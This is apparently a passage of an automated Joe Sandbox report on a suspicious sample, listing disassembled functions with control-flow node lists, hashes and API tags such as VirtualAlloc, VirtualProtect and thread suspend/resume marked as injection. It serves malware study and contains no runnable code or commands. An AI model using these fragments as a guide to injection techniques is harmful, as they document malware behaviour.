                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I
                                                          • API String ID: 0-2970573994
                                                          • Opcode ID: f57250585b184a015fbca1cbcf3e76d1c485423cfcb9271029c4e391eb8d43e0
                                                          • Instruction ID: c03564ac0a239108f3d840387d9cc024b8935fa9a8625002c0d5db84d6b3a94a
                                                          • Opcode Fuzzy Hash: f57250585b184a015fbca1cbcf3e76d1c485423cfcb9271029c4e391eb8d43e0
                                                          • Instruction Fuzzy Hash: 15222674A5891D8FDF99EF18D898BA9B7B1FB68305F1041D9D00EE7261DA31AE81CF40
                                                          Function 00007FF84915D205 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 676 7ff84915d205-7ff84915d240 679 7ff84915d259-7ff84915d26b 676->679 680 7ff84915d242-7ff84915d24f 676->680 683 7ff84915d26d-7ff84915d299 679->683 684 7ff84915d29e-7ff84915d2a9 679->684 680->679 685 7ff84915d251-7ff84915d257 680->685 696 7ff84915d64c-7ff84915d657 683->696 689 7ff84915d2fc-7ff84915d308 684->689 690 7ff84915d2ab-7ff84915d2c1 684->690 685->679 692 7ff84915d30a-7ff84915d31f 689->692 693 7ff84915d321 689->693 698 7ff84915d326-7ff84915d338 690->698 699 7ff84915d2c3-7ff84915d2db 690->699 692->693 693->696 705 7ff84915d33e-7ff84915d363 698->705 706 7ff84915d468-7ff84915d47a 698->706 703 7ff84915d2dd-7ff84915d2f5 699->703 704 7ff84915d2f7-7ff84915d2f8 699->704 703->704 704->689 705->706 714 7ff84915d369-7ff84915d37d 705->714 711 7ff84915d63a-7ff84915d64a 706->711 712 7ff84915d480-7ff84915d496 706->712 711->696 712->711 723 7ff84915d49c-7ff84915d4b0 712->723 718 7ff84915d658-7ff84915d6b8 714->718 719 7ff84915d383-7ff84915d38d 714->719 731 7ff84915d6f9-7ff84915d79a call 7ff84915c350 718->731 732 7ff84915d6ba-7ff84915d6e1 call 7ff84915ba10 718->732 721 7ff84915d38f-7ff84915d3a4 719->721 722 7ff84915d3a6-7ff84915d403 719->722 721->722 722->706 747 7ff84915d405-7ff84915d410 722->747 723->711 760 7ff84915d79c-7ff84915d7b3 731->760 751 7ff84915d462 747->751 752 7ff84915d412-7ff84915d41d 747->752 754 7ff84915d463 751->754 755 7ff84915d41f-7ff84915d437 752->755 756 7ff84915d439-7ff84915d44a 752->756 754->696 755->756 756->754 763 7ff84915d44c-7ff84915d461 756->763 764 7ff84915d7b9-7ff84915d7bd 760->764 763->751
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Q^H
                                                          • API String ID: 0-138190856
                                                          • Opcode ID: f14501856c21238a57a5e4f86283e0d5920f5b73e70fb0d1d027f62756b0b0c8
                                                          • Instruction ID: 2be9791e12d0d9d5361ece739cf91acc7e0d6093b6f149331dd1b7ec75012b05
                                                          • Opcode Fuzzy Hash: f14501856c21238a57a5e4f86283e0d5920f5b73e70fb0d1d027f62756b0b0c8
                                                          • Instruction Fuzzy Hash: DFE1B735E1DACA8FE7A5EF288454678B7E2FF55350F5A00BAC40DC7292DE28AC45CB41
                                                          Function 00007FF848A6239E Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 769 7ff848a6239e-7ff848a623ab 770 7ff848a623ad-7ff848a623b5 769->770 771 7ff848a623b6-7ff848a623c7 769->771 770->771 772 7ff848a623c9-7ff848a623d1 771->772 773 7ff848a623d2-7ff848a624eb VirtualProtect 771->773 772->773 778 7ff848a624ed 773->778 779 7ff848a624f3-7ff848a62543 773->779 778->779
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A5E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A5E000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a5e000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 23f3c3e895f7c8a09aa26ca0f4dab3b73836174b37067930d6f0e4cfcba22d98
                                                          • Instruction ID: 18d9ae28a334f234d2e908ce25eda42ba9b9b3827620eb69450a754429b95178
                                                          • Opcode Fuzzy Hash: 23f3c3e895f7c8a09aa26ca0f4dab3b73836174b37067930d6f0e4cfcba22d98
                                                          • Instruction Fuzzy Hash: 84516D70D0964D8FDB54DFA8C885AEDBBF1FF66310F10426AD049E3256DB74A885CB81
                                                          Function 00007FF848BFEB78 Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 782 7ff848bfeb78-7ff848bfebb1 783 7ff848bfebb4-7ff848bfec82 ResumeThread 782->783 784 7ff848bfebb3 782->784 788 7ff848bfec84 783->788 789 7ff848bfec8a-7ff848bfecd4 783->789 784->783 788->789
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 8906db486cdddec348b7a80142d95f0adbd4e7a2fe5251d16733a8dc3471fa3e
                                                          • Instruction ID: 6a495d07ad291466dadfe7aab156e55d06a2d7d8eb0751ff3bc10f480f7ee8f0
                                                          • Opcode Fuzzy Hash: 8906db486cdddec348b7a80142d95f0adbd4e7a2fe5251d16733a8dc3471fa3e
                                                          • Instruction Fuzzy Hash: 38516A7090C78C8FDB55DFA8D895AE8BFF0EF56310F1441ABD089DB292DA359846CB11
                                                          Function 00007FF848BFD35D Relevance: 1.6, APIs: 1, Instructions: 144threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 792 7ff848bfd35d-7ff848bfd369 793 7ff848bfd374-7ff848bfd442 SuspendThread 792->793 794 7ff848bfd36b-7ff848bfd373 792->794 798 7ff848bfd444 793->798 799 7ff848bfd44a-7ff848bfd494 793->799 794->793 798->799
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: SuspendThread
                                                          • String ID:
                                                          • API String ID: 3178671153-0
                                                          • Opcode ID: c555b1c2400e85e838d1995b34c28c5c546c70852d89ed642919398b0a78e709
                                                          • Instruction ID: 3e7066691dbbb917a8ddff009c5b9e6823d3e6ce464b5f4d30d26d4b99df738d
                                                          • Opcode Fuzzy Hash: c555b1c2400e85e838d1995b34c28c5c546c70852d89ed642919398b0a78e709
                                                          • Instruction Fuzzy Hash: 14413B70D08A4D8FDB98EFA8D885BEDBBF0FB5A310F14416AD049E7252DB70A845CB45
                                                          Function 00007FF848C009F5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 802 7ff848c009f5-7ff848c00ad3 GetFileAttributesW 806 7ff848c00ad5 802->806 807 7ff848c00adb-7ff848c00b19 802->807 806->807
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: b3b43a7336e14719ff5f912a42fab9b740ed2b32a7d4bf22b0deaaad11e7cb58
                                                          • Instruction ID: f511b793727b90f7a040f195f761a182e5fbf1951b6b979d6f865b1534912e0a
                                                          • Opcode Fuzzy Hash: b3b43a7336e14719ff5f912a42fab9b740ed2b32a7d4bf22b0deaaad11e7cb58
                                                          • Instruction Fuzzy Hash: 0A41F870E0864C8FDB98EF98D885BEDBBF0FB5A310F10416AD049E7252DA75A845CF45
                                                          Function 00007FF8493908B8 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I
                                                          • API String ID: 0-2970573994
                                                          • Opcode ID: 191136647227920b1a95b4d1512e56122c5b3288f9c55ca5724d8b3c1a24405a
                                                          • Instruction ID: 477b6b65c286cbc3c720fa9e109bf92b748ad034b77276a8c05ae8bbee694f07
                                                          • Opcode Fuzzy Hash: 191136647227920b1a95b4d1512e56122c5b3288f9c55ca5724d8b3c1a24405a
                                                          • Instruction Fuzzy Hash: 82D16774A1891C8FDFA9EF18D894BA977B5FB69305F1041D9D00EE7261DA31AE81CF40
                                                          Function 00007FF8493938D1 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: X09I
                                                          • API String ID: 0-168978767
                                                          • Opcode ID: a8a896f83819f0724fb48e5638a97ed11e64ecf167fe5f53e19778d1fd8da585
                                                          • Instruction ID: 0a37e17193e42d15c61456d1e1da1d24a0cc252f7dcea26f2467db38f6138eff
                                                          • Opcode Fuzzy Hash: a8a896f83819f0724fb48e5638a97ed11e64ecf167fe5f53e19778d1fd8da585
                                                          • Instruction Fuzzy Hash: 6071D571E1DA9E1FEBA8EF2858657B977D1EF56344B0400BED40DC32A2DD29AC058381
                                                          Function 00007FF849167779 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 895 7ff849167779-7ff84916777b 896 7ff84916777d-7ff849167781 895->896 897 7ff8491677fc-7ff849167801 895->897 898 7ff849167783-7ff849167786 896->898 899 7ff8491677f2-7ff8491677f3 896->899 900 7ff849167802-7ff849167805 897->900 898->900 903 7ff849167788 898->903 901 7ff84916786f 899->901 902 7ff8491677f4 899->902 904 7ff849167806-7ff849167818 900->904 905 7ff8491678e0 901->905 906 7ff849167870-7ff849167871 901->906 907 7ff849167865-7ff849167868 902->907 908 7ff8491677f5-7ff8491677f9 902->908 909 7ff8491677cf-7ff8491677e9 903->909 910 7ff84916778a-7ff849167795 903->910 928 7ff84916781c-7ff849167824 904->928 917 7ff84916786d-7ff84916786e 905->917 918 7ff8491678e2 905->918 913 7ff849167872-7ff849167874 906->913 911 7ff849167869 907->911 912 7ff8491678e4-7ff8491678e9 907->912 914 7ff8491677fb 908->914 915 7ff849167875 908->915 935 7ff8491677eb-7ff8491677ed 909->935 936 7ff84916785a-7ff849167863 909->936 910->904 916 7ff849167797-7ff84916779b 910->916 920 7ff8491678ea 911->920 921 7ff84916786a 911->921 912->920 913->915 923 7ff8491678f0-7ff8491678f5 913->923 914->897 926 7ff849167842-7ff849167857 914->926 924 7ff8491678f6-7ff8491678fa 915->924 925 7ff849167876 915->925 927 7ff84916779d-7ff8491677a0 916->927 916->928 917->901 917->920 918->912 940 7ff8491678ec-7ff8491678ed 920->940 941 7ff849167945-7ff849167949 920->941 933 7ff84916786b-7ff84916786c 921->933 934 7ff8491678b1-7ff8491678b6 921->934 923->924 931 7ff8491678fc-7ff849167900 924->931 932 7ff849167901-7ff849167913 924->932 937 7ff8491678bd-7ff8491678cf 925->937 938 7ff849167877-7ff84916787c 925->938 926->936 927->928 939 7ff8491677a2-7ff8491677a7 927->939 929 7ff849167825 928->929 930 7ff8491678a0-7ff8491678a4 928->930 945 7ff849167896-7ff84916789f 929->945 946 7ff849167826-7ff849167827 929->946 944 7ff8491678a5 930->944 931->932 933->917 947 7ff8491678b7-7ff8491678bc 934->947 935->911 942 7ff8491677ef 935->942 951 7ff8491678df 936->951 952 7ff849167864 936->952 958 7ff8491678d5 937->958 943 7ff84916787e-7ff849167893 938->943 949 7ff8491677a9-7ff8491677ce 939->949 950 7ff849167828-7ff849167829 939->950 940->923 954 7ff849167836 942->954 955 7ff8491677f1 942->955 943->945 960 7ff8491678ab-7ff8491678ad 944->960 945->930 946->950 947->937 949->909 950->944 957 7ff84916782a 950->957 951->905 952->907 952->958 954->947 962 7ff849167837 954->962 955->899 957->960 961 7ff84916782b 957->961 958->940 960->934 961->913 964 7ff84916782c-7ff84916782f 961->964 962->943 965 7ff849167838-7ff849167841 962->965 964->960 966 7ff849167831-7ff849167835 964->966 965->926 966->934 966->954
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `k*I
                                                          • API String ID: 0-1049311682
                                                          • Opcode ID: de39bfafef72e1eb309d4d2c515772b59d357acc7992fd434a9f5391beb16036
                                                          • Instruction ID: 9ecb2f03c00c0fb2cd7342663ea05059752fa5ea487fa3f83a3944b51d719797
                                                          • Opcode Fuzzy Hash: de39bfafef72e1eb309d4d2c515772b59d357acc7992fd434a9f5391beb16036
                                                          • Instruction Fuzzy Hash: 4871F431D0C6C98FE77AEE1888566B877C4FFC4391B1402B9D49EC7552EA1CAC56CB81
                                                          Function 00007FF849178EEB Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 967 7ff849178eeb-7ff849178eec 968 7ff849178eee-7ff849178ef3 967->968 969 7ff849178e8d-7ff849178ec1 968->969 970 7ff849178ef5-7ff849178efc 968->970 979 7ff849178eb3-7ff849178eb8 969->979 972 7ff849178efe-7ff849178f03 970->972 974 7ff849178f05-7ff849178f38 972->974 975 7ff849178f72-7ff849179021 972->975 974->968 984 7ff849178f3a-7ff849178fff 974->984 991 7ff84917903a-7ff849179073 975->991 992 7ff849178f94-7ff849179035 975->992 984->975 1007 7ff849178fba-7ff849178fbe 984->1007 1000 7ff8491790bd 991->1000 1001 7ff849179075-7ff8491790ce 991->1001 992->1007 1004 7ff8491790be-7ff84917974b 1000->1004 1001->1004 1007->975 1009 7ff849178fc0-7ff849178fc4 1007->1009 1009->972 1011 7ff849178fca-7ff849178fcf 1009->1011 1011->975 1012 7ff849178fd1-7ff849178fd7 1011->1012
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8C3I
                                                          • API String ID: 0-2641141967
                                                          • Opcode ID: 8fef7d976fb8ff2ae86116178f4bea036185bfe639b3716f531e44235bd17ade
                                                          • Instruction ID: 3cead32522943e4576069964c597dba9c574ef0eed19e004c7b07b470c55b948
                                                          • Opcode Fuzzy Hash: 8fef7d976fb8ff2ae86116178f4bea036185bfe639b3716f531e44235bd17ade
                                                          • Instruction Fuzzy Hash: 41818D30D2D58B8EEBA5EF6888946BDBBB1FF49380F5404F9D00ED7182DA3868458B51
                                                          Function 00007FF84915B89B Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1019 7ff84915b89b-7ff84915b8a3 1020 7ff84915b83d-7ff84915b871 1019->1020 1021 7ff84915b8a5-7ff84915b8ac 1019->1021 1030 7ff84915b863-7ff84915b868 1020->1030 1023 7ff84915b8ae-7ff84915b8b3 1021->1023 1025 7ff84915b8b5-7ff84915b9af call 7ff849164cdd 1023->1025 1026 7ff84915b922-7ff84915b9d1 1023->1026 1025->1026 1055 7ff84915b96a-7ff84915b96e 1025->1055 1043 7ff84915b9ea-7ff84915ba23 1026->1043 1044 7ff84915b944-7ff84915b9e5 1026->1044 1053 7ff84915ba6d 1043->1053 1054 7ff84915ba25-7ff84915ba7e 1043->1054 1044->1055 1057 7ff84915ba6e-7ff84915c0fb 1053->1057 1054->1057 1055->1026 1059 7ff84915b970-7ff84915b974 1055->1059 1059->1023 1060 7ff84915b97a-7ff84915b97f 1059->1060 1060->1026 1061 7ff84915b981-7ff84915b987 1060->1061
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: H
                                                          • API String ID: 0-2852464175
                                                          • Opcode ID: 2253b59a35f1c91cb89a06233631a977daf0a7ae17667281dafa2ae426992676
                                                          • Instruction ID: 3cfa68702cb7036a583a827bb3aef2c05f3ef5e92eaa25b745bc3f01aaede972
                                                          • Opcode Fuzzy Hash: 2253b59a35f1c91cb89a06233631a977daf0a7ae17667281dafa2ae426992676
                                                          • Instruction Fuzzy Hash: 3E71BF70D5D58ACEEBA9EF648851ABCBBA1EF45390F5501BAD00ED7186DE2C6841CB01
                                                          Function 00007FF848A63D8D Relevance: 1.5, APIs: 1, Instructions: 215memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1069 7ff848a63d8d-7ff848a63d95 1070 7ff848a63d98-7ff848a63da9 1069->1070 1071 7ff848a63d97 1069->1071 1072 7ff848a63d5d-7ff848a63d8a 1070->1072 1073 7ff848a63dab-7ff848a63ec3 VirtualAlloc 1070->1073 1071->1070 1079 7ff848a63ecb-7ff848a63f2f 1073->1079 1080 7ff848a63ec5 1073->1080 1080->1079
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A5E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A5E000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a5e000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 0ad1a301b23e2edc1a5d7030aed01eccd6a1ab543c409a59c9fce274db413672
                                                          • Instruction ID: 65e965d4fb3fbfc6dd3569c78e92b1b1c6eb503459f2d90816e7da0b73675fe3
                                                          • Opcode Fuzzy Hash: 0ad1a301b23e2edc1a5d7030aed01eccd6a1ab543c409a59c9fce274db413672
                                                          • Instruction Fuzzy Hash: CE514830908A1C8FDF94EF58C885BE9BBF1FB69311F1041AAD04DE3255DB70A986CB81
                                                          Function 00007FF849391F1C Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I
                                                          • API String ID: 0-2970573994
                                                          • Opcode ID: a5432914087a3838d7e32deb5dcb6d78295d90cef0a983cb753e9076769288d1
                                                          • Instruction ID: c1a5758e549bc810ec88d34590cfa7f3607358105d07426e444c4bd1d0128384
                                                          • Opcode Fuzzy Hash: a5432914087a3838d7e32deb5dcb6d78295d90cef0a983cb753e9076769288d1
                                                          • Instruction Fuzzy Hash: 8F51967090895D8FCFA9EF18D894BE8B7B1FB69345F1041A9D00EE7251DA35AE81CF40
                                                          Function 00007FF84917B162 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 80732b4b3a2d6ffaa75c2e9d0d672ab3bdc42d1d788726b969c9a68a0cc4b81f
                                                          • Instruction ID: a24d32f1c5e05ba54e04104b64029034391de57344b952a630dce82e95aaf45a
                                                          • Opcode Fuzzy Hash: 80732b4b3a2d6ffaa75c2e9d0d672ab3bdc42d1d788726b969c9a68a0cc4b81f
                                                          • Instruction Fuzzy Hash: CC514C30E4D58B9FDB59EFA8D455ABDB7B1FF55340F1040BAC01AA7282DB386901CB50
                                                          Function 00007FF84915F5F8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 0c1f1982281f778dbf1438c9cd48d1c1c5f78e9081e29311dae8d044d750bb82
                                                          • Instruction ID: 5073874d69ee5c1c99ce8b551fedd8e419b88aa9658442e7332add381f85afc0
                                                          • Opcode Fuzzy Hash: 0c1f1982281f778dbf1438c9cd48d1c1c5f78e9081e29311dae8d044d750bb82
                                                          • Instruction Fuzzy Hash: B4514670D0D68A9FDB59EFA8C4546BDBBB1FF44350F5141BAC00AE7292CA386901CB40
                                                          Function 00007FF849164D98 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 12a3284ba78f16d531a8f8b55715f2d0ff85da5830c82f082099ec31ad81286c
                                                          • Instruction ID: 313fc3b7f8471c5456756203c8e8375f7d7e968e7dcc7f3dc1e2e0cedebdab53
                                                          • Opcode Fuzzy Hash: 12a3284ba78f16d531a8f8b55715f2d0ff85da5830c82f082099ec31ad81286c
                                                          • Instruction Fuzzy Hash: 8E511A31E0C58A9FDB6AEFA8D4545BDB7B1FF59340F1041BAC41AA72C6CA386905CF50
                                                          Function 00007FF849180E08 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 8b57f1c849054820aaee5188cec9d475c9e9766d22f6dd5713ce857baba39665
                                                          • Instruction ID: ab3145da1fc9b1ceaa053b2469705c3c04792617b881d015afbf9ba3da5b1739
                                                          • Opcode Fuzzy Hash: 8b57f1c849054820aaee5188cec9d475c9e9766d22f6dd5713ce857baba39665
                                                          • Instruction Fuzzy Hash: EE513931E0C68E9FEB69EFA8C4505FDB7B1EF49340F1145AAC01AA7292CA386941DF50
                                                          Function 00007FF848BFECD9 Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 709427694e2ae986583c2144ef143866d940330f93a985b60511b41aa1600f4e
                                                          • Instruction ID: 38255f420b33c3b772ebc2b1a6eda0e1b074993b6f742de3d78206b6bf56bda7
                                                          • Opcode Fuzzy Hash: 709427694e2ae986583c2144ef143866d940330f93a985b60511b41aa1600f4e
                                                          • Instruction Fuzzy Hash: A3416D30D0865C8FDB58DFA8C885BEDBBF0EF56310F1041AAD449EB692DB34A845CB11
                                                          Function 00007FF84915C20C Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0S#I
                                                          • API String ID: 0-238827777
                                                          • Opcode ID: d1a802e311de1ffdd290a52ad45c5c26529fbd26ccf916b97ca7abb12d44c7d1
                                                          • Instruction ID: e60fe4415ddfc6fbd8fa5b8484711ea2a0b22a5fe10f401b9f045ac7f192b488
                                                          • Opcode Fuzzy Hash: d1a802e311de1ffdd290a52ad45c5c26529fbd26ccf916b97ca7abb12d44c7d1
                                                          • Instruction Fuzzy Hash: BB41F43194E3C94FE753AB34E8055F97FA0EB83374F0901FAD089CA0A3D6A95516CB52
                                                          Function 00007FF8491535F8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849150000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 45f3e29799306bcd0d518054656f49e67ac6da5cbc86b5722b9d5124cc911987
                                                          • Instruction ID: acf640a9a8870dd408d95120079fa70c6e927f35f36b22c9ed663dd1e67070e2
                                                          • Opcode Fuzzy Hash: 45f3e29799306bcd0d518054656f49e67ac6da5cbc86b5722b9d5124cc911987
                                                          • Instruction Fuzzy Hash: 46410470D0C64ADFDB5AEFA8C4545BDBBB1FF48350F9140ADC00AA7296DA396942CF50
                                                          Function 00007FF849393981 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
